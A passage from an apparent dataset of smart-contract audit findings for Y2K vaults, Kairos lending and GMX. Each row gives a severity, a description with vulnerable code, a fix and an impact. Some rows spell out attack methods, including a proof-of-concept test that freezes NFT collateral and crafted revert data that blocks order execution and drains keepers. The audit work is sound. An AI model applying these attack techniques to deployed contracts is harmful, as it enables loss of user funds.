won. After this, all these asset shares from the previous epoch are burnt. So the user won't be able to claim his winnings.\\nWhen user requests to `enlistInRollover`, he supplies the amount of assets to rollover, and this is saved in the queue.\\n```\\nrolloverQueue[index].assets = _assets;\\n```\\n\\nWhen `mintRollovers` is called, the function checks if the user won the previous epoch, and proceeds to burn all the shares the user requested to roll:\\n```\\n if (epochResolved[queue[index].epochId]) {\\n uint256 entitledShares = previewWithdraw(\\n queue[index].epochId,\\n queue[index].assets\\n );\\n // mint only if user won epoch he is rolling over\\n if (entitledShares > queue[index].assets) {\\n // rest of code\\n // @note we know shares were locked up to this point\\n _burn(\\n queue[index].receiver,\\n queue[index].epochId,\\n queue[index].assets\\n );\\n```\\n\\nThen, and this is the problem, the function mints to the user his original assets - `assetsToMint` - and not `entitledShares`.\\n```\\nuint256 assetsToMint = queue[index].assets - relayerFee;\\n_mintShares(queue[index].receiver, _epochId, assetsToMint);\\n```\\n\\nSo the user has only rolled his original assets, but since all his share of them is burned, he will not be able anymore to claim his winnings from them.\\nNote that if the user had called `withdraw` instead of rolling over, all his shares would be burned, but he would receive his `entitledShares`, and not just his original assets. We can see in this in `withdraw`. Note that `_assets` is burned (like in minting rollover) but `entitledShares` is sent (unlike minting rollover, which only remints _assets.)\\n```\\n _burn(_owner, _id, _assets);\\n _burnEmissions(_owner, _id, _assets);\\n uint256 entitledShares;\\n uint256 entitledEmissions = previewEmissionsWithdraw(_id, _assets);\\n if (epochNull[_id] == false) {\\n entitledShares = previewWithdraw(_id, _assets);\\n } else {\\n entitledShares = _assets;\\n }\\n if (entitledShares > 0) {\\n SemiFungibleVault.asset.safeTransfer(_receiver, entitledShares);\\n }\\n if (entitledEmissions > 0) {\\n emissionsToken.safeTransfer(_receiver, entitledEmissions);\\n }\\n```\\n","Either remint the user his winnings also, or if you don't want to make him roll over the winnings, change the calculation so he can still withdraw his shares of the winnings.",User will lose his rewards when rolling over.,```\\nrolloverQueue[index].assets = _assets;\\n```\\n +Adversary can break deposit queue and cause loss of funds,high,"Carousel.sol#L531-L538\\n```\\nfunction _mintShares(\\n address to,\\n uint256 id,\\n uint256 amount\\n) internal {\\n _mint(to, id, amount, EMPTY);\\n _mintEmissions(to, id, amount);\\n}\\n```\\n\\nWhen processing deposits for the deposit queue, it _mintShares to the specified receiver which makes a _mint subcall.\\nERC1155.sol#L263-L278\\n```\\nfunction _mint(address to, uint256 id, uint256 amount, bytes memory data) internal virtual {\\n require(to != address(0), ""ERC1155: mint to the zero address"");\\n\\n address operator = _msgSender();\\n uint256[] memory ids = _asSingletonArray(id);\\n uint256[] memory amounts = _asSingletonArray(amount);\\n\\n _beforeTokenTransfer(operator, address(0), to, ids, amounts, data);\\n\\n _balances[id][to] += amount;\\n emit TransferSingle(operator, address(0), to, id, amount);\\n\\n _afterTokenTransfer(operator, address(0), to, ids, amounts, data);\\n\\n _doSafeTransferAcceptanceCheck(operator, address(0), to, id, amount, data);\\n}\\n```\\n\\nThe base ERC1155 _mint is used which always behaves the same way that ERC721 safeMint does, that is, it always calls _doSafeTrasnferAcceptanceCheck which makes a call to the receiver. A malicious user can make the receiver always revert. This breaks the deposit queue completely. Since deposits can't be canceled this WILL result in loss of funds to all users whose deposits are blocked. To make matters worse it uses first in last out so the attacker can trap all deposits before them",Override _mint to remove the safeMint behavior so that users can't DOS the deposit queue,Users who deposited before the adversary will lose their entire deposit,"```\\nfunction _mintShares(\\n address to,\\n uint256 id,\\n uint256 amount\\n) internal {\\n _mint(to, id, amount, EMPTY);\\n _mintEmissions(to, id, amount);\\n}\\n```\\n" +Controller doesn't send treasury funds to the vault's treasury address,medium,"The Controller contract sends `treasury` funds to its own immutable `treasury` address instead of sending the funds to the one stored in the respective vault contract.\\nEach vault has a treasury address that is assigned on deployment which can also be updated through the factory contract:\\n```\\n constructor(\\n // // rest of code\\n address _treasury\\n ) SemiFungibleVault(IERC20(_assetAddress), _name, _symbol, _tokenURI) {\\n // // rest of code\\n treasury = _treasury;\\n whitelistedAddresses[_treasury] = true;\\n }\\n\\n function setTreasury(address _treasury) public onlyFactory {\\n if (_treasury == address(0)) revert AddressZero();\\n treasury = _treasury;\\n }\\n```\\n\\nBut, the Controller, responsible for sending the fees to the treasury, uses the immutable treasury address that it was initialized with:\\n```\\n constructor(\\n // // rest of code\\n address _treasury\\n ) {\\n // // rest of code\\n treasury = _treasury;\\n }\\n\\n // @audit just one example. Search for `treasury` in the Controller contract to find the others\\n function triggerEndEpoch(uint256 _marketId, uint256 _epochId) public {\\n // // rest of code\\n \\n // send premium fees to treasury and remaining TVL to collateral vault\\n premiumVault.sendTokens(_epochId, premiumFee, treasury);\\n // strike price reached so collateral is entitled to collateralTVLAfterFee\\n premiumVault.sendTokens(\\n _epochId,\\n premiumTVLAfterFee,\\n address(collateralVault)\\n );\\n\\n // // rest of code\\n }\\n```\\n","The Controller should query the Vault to get the correct treasury address, e.g.:\\n```\\ncollateralVault.sendTokens(_epochId, collateralFee, collateralVault.treasury());\\n```\\n",It's not possible to have different treasury addresses for different vaults. It's also not possible to update the treasury address of a vault although it has a function to do that. Funds will always be sent to the address the Controller was initialized with.,"```\\n constructor(\\n // // rest of code\\n address _treasury\\n ) SemiFungibleVault(IERC20(_assetAddress), _name, _symbol, _tokenURI) {\\n // // rest of code\\n treasury = _treasury;\\n whitelistedAddresses[_treasury] = true;\\n }\\n\\n function setTreasury(address _treasury) public onlyFactory {\\n if (_treasury == address(0)) revert AddressZero();\\n treasury = _treasury;\\n }\\n```\\n" +User deposit may never be entertained from deposit queue,medium,"Due to FILO (first in last out) stack structure, while dequeuing, the first few entries may never be retrieved. These means User deposit may never be entertained from deposit queue if there are too many deposits\\nAssume User A made a deposit which becomes 1st entry in `depositQueue`\\nPost this X more deposits were made, so `depositQueue.length=X+1`\\nRelayer calls `mintDepositInQueue` and process `X-9` deposits\\n```\\n while ((length - _operations) <= i) {\\n // this loop impelements FILO (first in last out) stack to reduce gas cost and improve code readability\\n // changing it to FIFO (first in first out) would require more code changes and would be more expensive\\n _mintShares(\\n queue[i].receiver,\\n _epochId,\\n queue[i].assets - relayerFee\\n );\\n emit Deposit(\\n msg.sender,\\n queue[i].receiver,\\n _epochId,\\n queue[i].assets - relayerFee\\n );\\n depositQueue.pop();\\n if (i == 0) break;\\n unchecked {\\n i--;\\n }\\n }\\n```\\n\\nThis reduces deposit queue to only 10\\nBefore relayer could process these, Y more deposits were made which increases deposit queue to `y+10`\\nThis means Relayer might not be able to again process User A deposit as this deposit is lying after processing `Y+9` deposits","Allow User to dequeue deposit queue based on index, so that if such condition arises, user would be able to dequeue his deposit (independent of relayer)",User deposit may remain stuck in deposit queue if a large number of deposit are present in queue and relayer is interested in dequeuing all entries,"```\\n while ((length - _operations) <= i) {\\n // this loop impelements FILO (first in last out) stack to reduce gas cost and improve code readability\\n // changing it to FIFO (first in first out) would require more code changes and would be more expensive\\n _mintShares(\\n queue[i].receiver,\\n _epochId,\\n queue[i].assets - relayerFee\\n );\\n emit Deposit(\\n msg.sender,\\n queue[i].receiver,\\n _epochId,\\n queue[i].assets - relayerFee\\n );\\n depositQueue.pop();\\n if (i == 0) break;\\n unchecked {\\n i--;\\n }\\n }\\n```\\n" +changeTreasury() Lack of check and remove old,medium,"changeTreasury() Lack of check and remove old\\nchangeTreasury() used to set new treasury The code is as follows:\\n```\\n function changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n {\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n IVaultV2(vaults[0]).setTreasury(treasury);\\n IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n }\\n```\\n\\nThe above code has the following problem:\\nno check whether the new treasury same as the old. If it is the same, the whitelist will be canceled.\\nUse setTreasury(VaultFactoryV2.treasury), it should be setTreasury(_treasury)\\nnot cancel old treasury from the whitelist","```\\n function changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n {\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n\\n+ require(vaults[0].treasury() !=_treasury,""same""); //check same\\n+ IVaultV2(vaults[0]).whiteListAddress(vaults[0].treasury()); //cancel old whitelist\\n+ IVaultV2(vaults[1]).whiteListAddress(vaults[1].treasury()); //cancel old whitelist\\n\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n+ IVaultV2(vaults[0]).setTreasury(_treasury);\\n+ IVaultV2(vaults[1]).setTreasury(_treasury);\\n- IVaultV2(vaults[0]).setTreasury(treasury);\\n- IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n }\\n```\\n",whiteListAddress abnormal,"```\\n function changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n {\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n IVaultV2(vaults[0]).setTreasury(treasury);\\n IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n }\\n```\\n" +mintRollovers should require entitledShares >= relayerFee,medium,"mintRollovers should require entitledShares >= relayerFee\\nIn mintRollovers, the rollover is only not skipped if queue[index].assets >= relayerFee,\\n```\\n if (entitledShares > queue[index].assets) {\\n // skip the rollover for the user if the assets cannot cover the relayer fee instead of revert.\\n if (queue[index].assets < relayerFee) {\\n index++;\\n continue;\\n }\\n```\\n\\nIn fact, since the user is already profitable, entitledShares is the number of assets of the user, which is greater than queue[index].assets, so it should check that entitledShares >= relayerFee, and use entitledShares instead of queue[index].assets to subtract relayerFee when calculating assetsToMint later.",Change to\\n```\\n if (entitledShares > queue[index].assets) {\\n // skip the rollover for the user if the assets cannot cover the relayer fee instead of revert.\\n// Remove the line below\\n if (queue[index].assets < relayerFee) {\\n// Add the line below\\n if (entitledShares < relayerFee) {\\n index// Add the line below\\n// Add the line below\\n;\\n continue;\\n }\\n// rest of code\\n// Remove the line below\\n uint256 assetsToMint = queue[index].assets // Remove the line below\\n relayerFee;\\n// Add the line below\\n uint256 assetsToMint = entitledShares // Remove the line below\\n relayerFee;\\n```\\n,This will prevent rollover even if the user has more assets than relayerFee,```\\n if (entitledShares > queue[index].assets) {\\n // skip the rollover for the user if the assets cannot cover the relayer fee instead of revert.\\n if (queue[index].assets < relayerFee) {\\n index++;\\n continue;\\n }\\n```\\n +Vault Factory ownership can be changed immediately and bypass timelock delay,medium,"The VaultFactoryV2 contract is supposed to use a timelock contract with a delay period when changing its owner. However, there is a loophole that allows the owner to change the owner address instantly, without waiting for the delay period to expire. This defeats the purpose of the timelock contract and exposes the VaultFactoryV2 contract to potential abuse.\\nIn project description, timelock is required when making critical changes. Admin can only configure new markets and epochs on those markets.\\n```\\n 2) Admin can configure new markets and epochs on those markets, Timelock can make cirital changes like changing the oracle or whitelisitng controllers.\\n```\\n\\nThe VaultFactoryV2 contract has a `changeOwner` function that is supposed to be called only by the timelock contract with a delay period.\\n```\\nfunction changeOwner(address _owner) public onlyTimeLocker {\\n if (_owner == address(0)) revert AddressZero();\\n _transferOwnership(_owner);\\n }\\n```\\n\\nThe VaultFactoryV2 contract inherits from the Openzeppelin Ownable contract, which has a `transferOwnership` function that allows the owner to change the owner address immediately. However, the `transferOwnership` function is not overridden by the `changeOwner` function, which creates a conflict and a vulnerability. The owner can bypass the timelock delay and use the `transferOwnership` function to change the owner address instantly.\\n```\\n function transferOwnership(address newOwner) public virtual onlyOwner {\\n require(newOwner != address(0), ""Ownable: new owner is the zero address"");\\n _transferOwnership(newOwner);\\n }\\n```\\n",Override the `transferOwnership` function and add modifier `onlyTimeLocker`.,"The transferOwnership is not worked as design (using timelock), the timelock delay become useless. This means that if the owner address is hacked or corrupted, the attacker can take over the contract immediately, leaving no time for the protocol and the users to respond or intervene.","```\\n 2) Admin can configure new markets and epochs on those markets, Timelock can make cirital changes like changing the oracle or whitelisitng controllers.\\n```\\n" +VaultFactoryV2#changeTreasury misconfigures the vault,medium,"VaultFactoryV2#changeTreasury misconfigures the vault because the setTreasury subcall uses the wrong variable\\nVaultFactoryV2.sol#L228-L246\\n```\\nfunction changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n{\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n IVaultV2(vaults[0]).setTreasury(treasury);\\n IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n}\\n```\\n\\nWhen setting the treasury for the underlying vault pair it accidentally use the treasury variable instead of _treasury. This means it uses the local VaultFactoryV2 treasury rather than the function input.\\nControllerPeggedAssetV2.sol#L111-L123\\n```\\n premiumVault.sendTokens(_epochId, premiumFee, treasury);\\n premiumVault.sendTokens(\\n _epochId,\\n premiumTVL - premiumFee,\\n address(collateralVault)\\n );\\n // strike price is reached so collateral is still entitled to premiumTVL - premiumFee but looses collateralTVL\\n collateralVault.sendTokens(_epochId, collateralFee, treasury);\\n collateralVault.sendTokens(\\n _epochId,\\n collateralTVL - collateralFee,\\n address(premiumVault)\\n );\\n```\\n\\nThis misconfiguration can be damaging as it may cause the triggerDepeg call in the controller to fail due to the sendToken subcall. Additionally the time lock is the one required to call it which has a minimum of 3 days wait period. The result is that valid depegs may not get paid out since they are time sensitive.",Set to _treasury rather than treasury.,Valid depegs may be missed due to misconfiguration,"```\\nfunction changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n{\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n IVaultV2(vaults[0]).setTreasury(treasury);\\n IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n}\\n```\\n" +Null epochs will freeze rollovers,medium,"When rolling a position it is required that the user didn't payout on the last epoch. The issue with the check is that if a null epoch is triggered then rollovers will break even though the vault didn't make a payout\\nCarousel.sol#L401-L406\\n```\\n uint256 entitledShares = previewWithdraw(\\n queue[index].epochId,\\n queue[index].assets\\n );\\n // mint only if user won epoch he is rolling over\\n if (entitledShares > queue[index].assets) {\\n```\\n\\nWhen minting rollovers the following check is made so that the user won't automatically roll over if they made a payout last epoch. This check however will fail if there is ever a null epoch. Since no payout is made for a null epoch it should continue to rollover but doesn't.",Change to less than or equal to:\\n```\\n- if (entitledShares > queue[index].assets) {\\n+ if (entitledShares >= queue[index].assets) {\\n```\\n,Rollover will halt after null epoch,"```\\n uint256 entitledShares = previewWithdraw(\\n queue[index].epochId,\\n queue[index].assets\\n );\\n // mint only if user won epoch he is rolling over\\n if (entitledShares > queue[index].assets) {\\n```\\n" +Inconsistent use of epochBegin could lock user funds,medium,"The epochBegin timestamp is used inconsistently and could lead to user funds being locked.\\nThe function `ControllerPeggedAssetV2.triggerNullEpoch` checks for timestamp like this:\\n```\\nif (block.timestamp < uint256(epochStart)) revert EpochNotStarted();\\n```\\n\\nThe modifier `epochHasNotStarted` (used by Carousel.deposit) checks it like this:\\n```\\nif (block.timestamp > epochConfig[_id].epochBegin)\\n revert EpochAlreadyStarted();\\n```\\n\\nBoth functions can be called when `block.timestamp == epochBegin`. This could lead to a scenario where a deposit happens after `triggerNullEpoch` is called (both in the same block). Because `triggerNullEpoch` sets the value for `finalTVL`, the TVL that comes from the deposit is not accounted for. If emissions have been distributed this epoch, this will lead to the incorrect distribution of emissions and once all emissions have been claimed the remaining assets will not be claimable, due to reversion in `withdraw` when trying to send emissions:\\n```\\nfunction previewEmissionsWithdraw(uint256 _id, uint256 _assets)\\n public\\n view\\n returns (uint256 entitledAmount)\\n{\\n entitledAmount = _assets.mulDivDown(emissions[_id], finalTVL[_id]);\\n}\\n// rest of code\\n//in withdraw:\\nuint256 entitledEmissions = previewEmissionsWithdraw(_id, _assets);\\nif (epochNull[_id] == false) {\\n entitledShares = previewWithdraw(_id, _assets);\\n} else {\\n entitledShares = _assets;\\n}\\nif (entitledShares > 0) {\\n SemiFungibleVault.asset.safeTransfer(_receiver, entitledShares);\\n}\\nif (entitledEmissions > 0) {\\n emissionsToken.safeTransfer(_receiver, entitledEmissions);\\n}\\n```\\n\\nThe above could also lead to revert through division by 0 if `finalTVL` is set to 0, even though the deposit after was successful.",The modifier `epochHasNotStarted` should use `>=` as comparator,"incorrect distribution, Loss of deposited funds",```\\nif (block.timestamp < uint256(epochStart)) revert EpochNotStarted();\\n```\\n +Denial-of-Service in the liquidation flow results in the collateral NTF will be stuck in the contract.,medium,"If the `loanTovalue` value of the offer is extremely high, the liquidation flow will be reverted, causing the collateral NTF to persist in the contract forever.\\nThe platform allows users to sign offers and provide funds to those who need to borrow assets.\\nIn the first scenario, the lender provided an offer that the `loanTovalue` as high as the result of the `shareMatched` is `0`. For example, if the borrowed amount was `1e40` and the offer had a `loanTovalue` equal to `1e68`, the share would be `0`.\\nAs a result, an arithmetic error (Division or modulo by 0) will occur in the `price()` function at line 50 during the liquidation process.\\nIn the second scenario, if the lender's share exceeds `0`, but the offer's `loanToValue` is extremely high, the `price()` function at line 54 may encounter an arithmetic error(Arithmetic over/underflow) during the `estimatedValue` calculation.\\nPoof of Concept\\nkairos-contracts/test/BorrowBorrow.t.sol\\n```\\nfunction testBorrowOverflow() public {\\n uint256 borrowAmount = 1e40;\\n BorrowArg[] memory borrowArgs = new BorrowArg[](1);\\n (, ,uint256 loanId , ) = kairos.getParameters();\\n loanId += 1;\\n\\n Offer memory offer = Offer({\\n assetToLend: money,\\n loanToValue: 1e61,\\n duration: 1,\\n expirationDate: block.timestamp + 2 hours,\\n tranche: 0,\\n collateral: getNft()\\n });\\n uint256 currentTokenId;\\n\\n getFlooz(signer, money, getOfferArg(offer).amount);\\n\\n {\\n OfferArg[] memory offerArgs = new OfferArg[](1);\\n currentTokenId = getJpeg(BORROWER, nft);\\n offer.collateral.id = currentTokenId;\\n offerArgs[0] = OfferArg({\\n signature: getSignature(offer),\\n amount: borrowAmount,\\n offer: offer\\n });\\n borrowArgs[0] = BorrowArg({nft: NFToken({id: currentTokenId, implem: nft}), args: offerArgs});\\n }\\n\\n vm.prank(BORROWER);\\n kairos.borrow(borrowArgs);\\n\\n assertEq(nft.balanceOf(BORROWER), 0);\\n assertEq(money.balanceOf(BORROWER), borrowAmount);\\n assertEq(nft.balanceOf(address(kairos)), 1);\\n\\n vm.warp(block.timestamp + 1);\\n Loan memory loan = kairos.getLoan(loanId);\\n console.log(""price of loanId"", kairos.price(loanId));\\n}\\n```\\n",We recommend adding the mechanism during the borrowing process to restrict the maximum `loanToValue` limit and ensure that the lender's share is always greater than zero. This will prevent arithmetic errors.,"The loan position will not be liquidated, which will result in the collateral NTF being permanently frozen in the contract.","```\\nfunction testBorrowOverflow() public {\\n uint256 borrowAmount = 1e40;\\n BorrowArg[] memory borrowArgs = new BorrowArg[](1);\\n (, ,uint256 loanId , ) = kairos.getParameters();\\n loanId += 1;\\n\\n Offer memory offer = Offer({\\n assetToLend: money,\\n loanToValue: 1e61,\\n duration: 1,\\n expirationDate: block.timestamp + 2 hours,\\n tranche: 0,\\n collateral: getNft()\\n });\\n uint256 currentTokenId;\\n\\n getFlooz(signer, money, getOfferArg(offer).amount);\\n\\n {\\n OfferArg[] memory offerArgs = new OfferArg[](1);\\n currentTokenId = getJpeg(BORROWER, nft);\\n offer.collateral.id = currentTokenId;\\n offerArgs[0] = OfferArg({\\n signature: getSignature(offer),\\n amount: borrowAmount,\\n offer: offer\\n });\\n borrowArgs[0] = BorrowArg({nft: NFToken({id: currentTokenId, implem: nft}), args: offerArgs});\\n }\\n\\n vm.prank(BORROWER);\\n kairos.borrow(borrowArgs);\\n\\n assertEq(nft.balanceOf(BORROWER), 0);\\n assertEq(money.balanceOf(BORROWER), borrowAmount);\\n assertEq(nft.balanceOf(address(kairos)), 1);\\n\\n vm.warp(block.timestamp + 1);\\n Loan memory loan = kairos.getLoan(loanId);\\n console.log(""price of loanId"", kairos.price(loanId));\\n}\\n```\\n" +Adversary can utilize a large number of their own loans to cheat other lenders out of interest,medium,"The minimal interest paid by a loan is scaled by the number of provisions that make up the loan. By inflating the number of provisions with their own provisions then can cause legitimate lenders to receive a much lower interest rate than intended.\\nClaimFacet.sol#L94-L106\\n```\\nfunction sendInterests(Loan storage loan, Provision storage provision) internal returns (uint256 sent) {\\n uint256 interests = loan.payment.paid - loan.lent;\\n if (interests == loan.payment.minInterestsToRepay) {\\n // this is the case if the loan is repaid shortly after issuance\\n // each lender gets its minimal interest, as an anti ddos measure to spam offer\\n sent = provision.amount + (interests / loan.nbOfPositions);\\n } else {\\n /* provision.amount / lent = share of the interests belonging to the lender. The parenthesis make the\\n calculus in the order that maximizes precison */\\n sent = provision.amount + (interests * (provision.amount)) / loan.lent;\\n }\\n loan.assetLent.checkedTransfer(msg.sender, sent);\\n}\\n```\\n\\nIf a loan is paid back before the minimal interest rate has been reached then each provision will receive the unweighted minimal interest amount. This can be abused to take loans that pay legitimate lenders a lower APR than expected, cheating them of their yield.\\nExample: A user wishes to borrow 1000 USDC at 10% APR. Assume the minimal interest per provision is 10 USDC and minimum borrow amount is 20 USDC. After 1 year the user would owe 100 USDC in interest. A user can abuse the minimum to pay legitimate lenders much lower than 10% APR. The attacker will find a legitimate offer to claim 820 USDC. This will create an offer for themselves and borrow 20 USDC from it 9 times. This creates a total of 10 provisions each owed a minimum of 10 USDC or 100 USDC total. Now after 1 year they owe 100 USDC on their loan and the repay the loan. Since 100 USDC is the minimum, each of the 10 provisions will get their minimal interest. 90 USDC will go to their provisions and 10 will go to the legitimate user who loaned them a majority of the USDC. Their APR is ~1.2% which is ~1/9th of what they specified.",The relative size of the provisions should be enforced so that one is not much larger than any other one,Legitimate users can be cheated out of interest owed,"```\\nfunction sendInterests(Loan storage loan, Provision storage provision) internal returns (uint256 sent) {\\n uint256 interests = loan.payment.paid - loan.lent;\\n if (interests == loan.payment.minInterestsToRepay) {\\n // this is the case if the loan is repaid shortly after issuance\\n // each lender gets its minimal interest, as an anti ddos measure to spam offer\\n sent = provision.amount + (interests / loan.nbOfPositions);\\n } else {\\n /* provision.amount / lent = share of the interests belonging to the lender. The parenthesis make the\\n calculus in the order that maximizes precison */\\n sent = provision.amount + (interests * (provision.amount)) / loan.lent;\\n }\\n loan.assetLent.checkedTransfer(msg.sender, sent);\\n}\\n```\\n" +minOfferCost can be bypassed in certain scenarios,medium,"minOfferCost is designed to prevent spam loan requests that can cause the lender to have positions that cost more gas to claim than interest. Due to how interest is calculated right after this minimum is passed it is still possible for the lender to receive less than the minimum.\\nClaimFacet.sol#L94-L106\\n```\\nfunction sendInterests(Loan storage loan, Provision storage provision) internal returns (uint256 sent) {\\n uint256 interests = loan.payment.paid - loan.lent;\\n if (interests == loan.payment.minInterestsToRepay) {\\n // this is the case if the loan is repaid shortly after issuance\\n // each lender gets its minimal interest, as an anti ddos measure to spam offer\\n sent = provision.amount + (interests / loan.nbOfPositions);\\n } else {\\n /* provision.amount / lent = share of the interests belonging to the lender. The parenthesis make the\\n calculus in the order that maximizes precison */\\n sent = provision.amount + (interests * (provision.amount)) / loan.lent; <- audit-issue minimal interest isn't guaranteed\\n }\\n loan.assetLent.checkedTransfer(msg.sender, sent);\\n}\\n```\\n\\nWhen a loan has generated more than the minimum interest amount the method for calculating the interest paid is different and depending on the size of the provisions it may lead to provisions that are under the guaranteed minimum.\\nExample: Assume the minimum interest is 1e18. A loan is filled with 2 provisions. The first provision is 25% and the second is 75%. Since there are two loans the total minimum interest for the loan is 2e18. After some time the paid interest reaches 2.001e18 and the loan is paid back. Since it is above the minimum interest rate, it is paid out proportionally. This gives 0.5e18 to the first provision and 1.5e18 to the second provision. This violates the minimum guaranteed interest amount.","Minimum interest should be set based on the percentage of the lowest provision and provision shouldn't be allowed to be lower than some amount. Since this problem occurs when the percentage is less than 1/n (where n is the number of provisions), any single provision should be allowed to be lower than 1/(2n).",Minimum interest guarantee can be violated,"```\\nfunction sendInterests(Loan storage loan, Provision storage provision) internal returns (uint256 sent) {\\n uint256 interests = loan.payment.paid - loan.lent;\\n if (interests == loan.payment.minInterestsToRepay) {\\n // this is the case if the loan is repaid shortly after issuance\\n // each lender gets its minimal interest, as an anti ddos measure to spam offer\\n sent = provision.amount + (interests / loan.nbOfPositions);\\n } else {\\n /* provision.amount / lent = share of the interests belonging to the lender. The parenthesis make the\\n calculus in the order that maximizes precison */\\n sent = provision.amount + (interests * (provision.amount)) / loan.lent; <- audit-issue minimal interest isn't guaranteed\\n }\\n loan.assetLent.checkedTransfer(msg.sender, sent);\\n}\\n```\\n" +Incomplete error handling causes execution and freezing/cancelling of Deposits/Withdrawals/Orders to fail.,high,"Users can define callbacks for Deposits/Withdrawals/Orders execution and cancellations. GMX protocol attempts to manage errors during the execution of the callbacks\\nA user controlled callback can return a specially crafted revert reason that will make the error handling revert.\\nBy making the execution and cancelation revert, a malicious actor can game orders and waste keeper gas.\\nThe bug resides in ErrorUtilss `getRevertMessage` that is called on every callback attempt. Example of deposit callback:\\n```\\ntry IDepositCallbackReceiver(deposit.callbackContract()).afterDepositExecution{ gas: deposit.callbackGasLimit() }(key, deposit) {\\n } catch (bytes memory reasonBytes) {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n emit AfterDepositExecutionError(key, deposit, reason, reasonBytes);\\n }\\n```\\n\\nAs can be seen in the above above snippets, the `reasonBytes` from the catch statement is passed to `getRevertMessage` which tries to extract the `Error(string)` message from the revert. The issue is that the data extracted from the revert can be crafted to revert on `abi.decode`.\\nI will elaborate: Correct (expected) revert data looks as follows: 1st 32 bytes: 0x000..64 (bytes memory size) 2nd 32 bytes: 0x08c379a0 (Error(string) selector) 3rd 32 bytes: offset to data 4th 32 bytes: length of data 5th 32 bytes: data\\n`abi.decode` reverts if the data is not structure correctly. There can be two reasons for revert:\\nif the 3rd 32 bytes (offset to data) is larger then the uint64 (0xffffffffffffffff)\\nSimplified yul: `if gt(offset, 0xffffffffffffffff) { revert }`\\nif the 3rd 32 bytes (offset to data) is larger then the uint64 of the encoded data, the call will revert\\nSimplieifed yul: `if iszero(slt(add(offset, 0x1f), size) { revert }`\\nBy reverting with the following data in the callback, the `getRevertMessage` will revert: 0x000....64 0x0x08c379a0...000 0xffffffffffffffff....000 0x000...2 0x4141","When parsing the revert reason, validate the offsets are smaller then the length of the encoding.","There are two impacts will occur when the error handling reverts:\\n(1) Orders can be gamed\\nSince the following callbacks are controlled by the user,:\\n`afterOrderExecution`\\n`afterOrderCancellation`\\n`afterOrderFrozen`\\nThe user can decide when to send the malformed revert data and when not. Essentially preventing keepers from freezing orders and from executing orders until it fits the attacker.\\nThere are two ways to game the orders:\\nAn attacker can create a risk free order, by setting a long increase order. If the market increases in his favor, he can decide to ""unblock"" the execution and receive profit. If the market decreases, he can cancel the order or wait for the right timing.\\nAn attacker can create a limit order with a size larger then what is available in the pool. The attacker waits for the price to hit and then deposit into the pool to make the transaction work. This method is supposed to be prevented by freezing orders, but since the attacker can make the `freezeOrder` revert, the scenario becomes vulnerable again.\\n(2) drain keepers funds\\nSince exploiting the bug for both execution and cancellation, keepers will ALWAYS revert when trying to execute Deposits/Withdrawals/Orders. The protocol promises to always pay keepers at-least the execution cost. By making the execution and cancellations revert the Deposits/Withdrawals/Orders will never be removed from the store and keepers transactions will keep reverting until potentially all their funds are wasted.","```\\ntry IDepositCallbackReceiver(deposit.callbackContract()).afterDepositExecution{ gas: deposit.callbackGasLimit() }(key, deposit) {\\n } catch (bytes memory reasonBytes) {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n emit AfterDepositExecutionError(key, deposit, reason, reasonBytes);\\n }\\n```\\n" +Keeper can make deposits/orders/withdrawals fail and receive fee+rewards,medium,"Malicious keeper can make execution of deposits/orders/withdrawals fail by providing limited gas to the execution.\\nIf enough gas is sent for the cancellation to succeed but for the execution to fail the keeper is able to receive the execution fee + incentive rewards and cancel all deposits/orders/withdrawals.\\n```\\nfunction executeDeposit(\\n bytes32 key,\\n OracleUtils.SetPricesParams calldata oracleParams\\n ) external\\n globalNonReentrant\\n onlyOrderKeeper\\n withOraclePrices(oracle, dataStore, eventEmitter, oracleParams)\\n {\\n uint256 startingGas = gasleft();\\n\\n try this._executeDeposit(\\n key,\\n oracleParams,\\n msg.sender,\\n startingGas\\n ) {\\n } catch (bytes memory reasonBytes) {\\n _handleDepositError(\\n key,\\n startingGas,\\n 